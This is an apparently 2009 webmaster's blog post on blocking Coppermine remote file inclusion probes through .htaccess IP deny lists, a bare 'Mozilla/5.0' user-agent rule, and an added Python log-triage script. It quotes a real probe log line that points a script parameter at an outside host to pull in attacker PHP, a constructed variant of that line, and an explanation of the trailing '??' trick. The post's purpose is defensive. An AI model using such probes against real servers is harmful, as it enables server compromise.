
Block server exploit attacks coming from ThePlanet IP space

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses during any given week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending it requests designed to exploit unpatched versions of software commonly used by website owners. Most attempts involve trying to upload or inject a hostile file through a PHP script that is known to be exploitable. These are commonly called PHP injection exploits; the specific technique in the entry below is a remote file inclusion (RFI): a URL parameter that the vulnerable script passes to include() is pointed at a file on the attacker's server, so the script fetches the attacker's PHP code and executes it. The trailing "??" on the injected URL turns anything the script appends to the path into part of the query string of the remote request, so the hostile file is fetched unchanged. Of the targeted scripts, the one that I see almost every day in my access logs is the Coppermine Gallery script. Hardly a day goes by without some script kiddie, hacker, or bot trying to upload or inject hostile files to my server via Coppermine exploits, as demonstrated in the following actual log entry (the 403 after the request is the server's response code, meaning this request was refused):


70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

We can use DNSStuff or DomainTools to run a WHOIS lookup on that IP address...

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item shown is the CIDR of the entity in question. CIDR stands for "Classless Inter-Domain Routing." It is written by appending a forward slash and a number to a starting IP address; the number is how many leading bits of the address are fixed, and every address sharing those bits belongs to the range. In this case, 70.84.0.0/14 fixes the first 14 bits and leaves 18 to vary, so it covers 2^18 = 262,144 addresses, from 70.84.0.0 through 70.87.255.255.

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which together are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that falls inside one of the CIDRs in the blocklist will get a 403 Forbidden response, no matter what page it requests on a website that employs these rules.

Furthermore, I have included a ".htaccess" mod_rewrite rule to block requests whose user agent is exactly "Mozilla/5.0" and nothing more. Real browsers send a much longer string that merely begins with Mozilla/5.0 (followed by platform and version details in parentheses); the bare string on its own is what exploit scanners and bots send, as in the log entry above. Read on and learn how to protect your Apache web server, or Apache-hosted websites, from exploit attacks coming from ThePlanet and the like, or from tools identifying themselves only as Mozilla/5.0.


If you own a website that is hosted on an Apache web server, and you are allowed to modify a special control file named ".htaccess," you can add IP addresses and CIDRs to "deny from" blocklists and probably also use mod_rewrite rules. Use your main .htaccess file to deny access (403 Forbidden) to the CIDRs assigned to ThePlanet hosting services and to anybody using a tool identifying itself as "Mozilla/5.0." Use the following directives in a .htaccess in your public web root to block ThePlanet, et al.

If you already have a .htaccess in the web root, log onto the server with your FTP client, then unhide hidden server files by means of whatever option your client offers (or enter -al into the "Remote File Mask" input box). Download .htaccess to your computer and open it for editing in a plain text editor (e.g. Notepad). Immediately save an unaltered backup copy with a 1 appended to the name (e.g. .htaccess1 or htaccess.txt), then copy and paste the directives below into the working copy. Save the changes and upload it back to the server. Be sure to try to view your home page right after making changes to .htaccess. If you made a typographic error you will get a "Server 500" error, which locks everyone out of the website. If that occurs, upload the original backup, delete the problem file on the server, and rename the backup back to .htaccess. Then go over your changes on the local copy, correct any typos, and try uploading it again.

Just remember this rule when editing .htaccess: if a line isn't a known directive, precede it with the # sign. That makes it a comment and it is ignored by the server. The # must be the first character on its own line; Apache does not allow a comment at the end of a line that also contains a directive. Forget this and you will get a Server 500 lockout.

.htaccess additions to block ThePlanet, Everyone's Internet, Rackspace and Mozilla/5.0:

<Files *>
# Apache 2.2 (mod_authz_host) syntax: with "order deny,allow" the deny list is
# checked first and anything not listed is allowed. Apache 2.4 replaces
# order/deny with "Require" directives.
order deny,allow
# ThePlanet.com and Everyones Internet
deny from 64.5.32.0/19 64.246.0.0/18 66.98.128.0/17 67.15.0.0/16 67.18.0.0/15 69.93.0.0/16 70.84.0.0/14 74.52.0.0/14 75.125.0.0/16 174.132.0.0/15 207.44.128.0/17 209.62.0.0/17 216.127.64.0/19

# Let's toss in "Rackspace" - Hackers, spammers, scammers and phishers
deny from 67.192.0.0/16 69.20.0.0/17 72.3.128.0/17 72.32.0.0/16 74.205.0.0/17
</Files>

# Now, to kill requests from hackers using the user agent "Mozilla/5.0" - add these directives under the previous section:

# mod_rewrite in .htaccess requires FollowSymLinks (or SymLinksIfOwnerMatch)
Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

# Anchored with ^ and $, so only the bare string "Mozilla/5.0" matches; a real
# browser whose agent string begins "Mozilla/5.0 (" is not affected.
# [F] answers with 403 Forbidden.
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0$
RewriteRule .* - [F]

# end of .htaccess additions
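The following Python script is an added example, not code from this article or from the Coppermine project. It reproduces in Python the two checks that the .htaccess directives above perform (client IP inside one of the listed CIDRs, and the bare "Mozilla/5.0" user agent) so you can run them over an access log offline, and it adds a third check that the .htaccess rules do not make: flagging any query parameter whose value is a remote URL, which is the signature of the remote file inclusion probe in the Coppermine log entry quoted above. Only the first sample log line is the real entry from the article; the others are constructed for the example, and the 192.0.2.x and 203.0.113.x addresses are reserved documentation ranges, not real clients.

```python
"""Triage Apache access-log lines against the .htaccess blocklist rules.

Added example for this post, not code from the article or from Coppermine.
"""
import ipaddress
import re
from urllib.parse import parse_qsl

# The CIDRs from the "deny from" rules above (ThePlanet, Everyone's Internet, Rackspace).
BLOCKED_CIDRS = [ipaddress.ip_network(cidr) for cidr in """
    64.5.32.0/19 64.246.0.0/18 66.98.128.0/17 67.15.0.0/16 67.18.0.0/15 69.93.0.0/16
    70.84.0.0/14 74.52.0.0/14 75.125.0.0/16 174.132.0.0/15 207.44.128.0/17
    209.62.0.0/17 216.127.64.0/19
    67.192.0.0/16 69.20.0.0/17 72.3.128.0/17 72.32.0.0/16 74.205.0.0/17
""".split()]

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Same anchored pattern as the RewriteCond above: the bare string and nothing more,
# so a real browser whose agent string merely begins with "Mozilla/5.0 (" is not matched.
BARE_UA_RE = re.compile(r'^Mozilla/5\.0$')

# A query-string value that is itself a URL is how remote file inclusion probes are delivered.
REMOTE_URL_RE = re.compile(r'^https?://', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def in_blocklist(ip):
    """True when the client address falls inside any CIDR in the deny list."""
    addr = ipaddress.ip_address(ip)
    return any(addr in network for network in BLOCKED_CIDRS)


def remote_url_params(request):
    """Names of query parameters whose value starts with http:// or https://."""
    parts = request.split()
    if len(parts) < 2:
        return []
    # Split on the first "?" by hand: the request path in the article's entry starts
    # with "//", which urlsplit() would misread as a host name.
    _, _, query = parts[1].partition('?')
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]


def triage(log_text):
    """Return (ip, status, reasons) for every line that trips at least one check."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = []
        if in_blocklist(entry['ip']):
            reasons.append('blocked CIDR')
        if BARE_UA_RE.match(entry['agent']):
            reasons.append('bare Mozilla/5.0 user agent')
        rfi_params = remote_url_params(entry['request'])
        if rfi_params:
            reasons.append('remote URL in ' + ', '.join(rfi_params))
        if reasons:
            findings.append((entry['ip'], entry['status'], reasons))
    return findings


# Constructed sample log. Only the first line is the real entry quoted in the article;
# 192.0.2.x and 203.0.113.x are reserved documentation addresses, not real clients.
SAMPLE_LOG = """\
70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Nov/2009:06:31:14 -0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
203.0.113.7 - - [12/Nov/2009:06:32:40 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://203.0.113.7/x.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
72.32.5.5 - - [12/Nov/2009:06:33:01 -0800] "GET /robots.txt HTTP/1.1" 403 137 "-" "curl/7.19.7 (x86_64-pc-linux-gnu)"
"""

if __name__ == '__main__':
    for ip, status, reasons in triage(SAMPLE_LOG):
        print(f'{ip:<15} {status}  {"; ".join(reasons)}')
```

The third sample line is the reason for the extra check: the same Coppermine probe arriving from an address outside the listed CIDRs, with a user agent that is not the bare string, passes both .htaccess rules untouched. The IP and user-agent blocklists cut down the noise from the networks you see most, but the only defence against the probe itself is keeping Coppermine patched and, where your host allows it, turning allow_url_include off in PHP.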

I will be writing other articles showing you how to block more of these PHP injection exploit attacks, at a later date. If you want to use pre-defined .htaccess blocklists, I have four of them online and available from my Htaccess Blocklists page. Copy and paste them into your .htaccess file as needed, testing as you go. Please consider donating via PayPal, to help me pay for my research time and hosting costs. Donation buttons are found on all of my blocklist pages.


About the author
Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.

I produce this blog and website at my own expense. If you find this information valuable please consider making a donation via PayPal.


Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.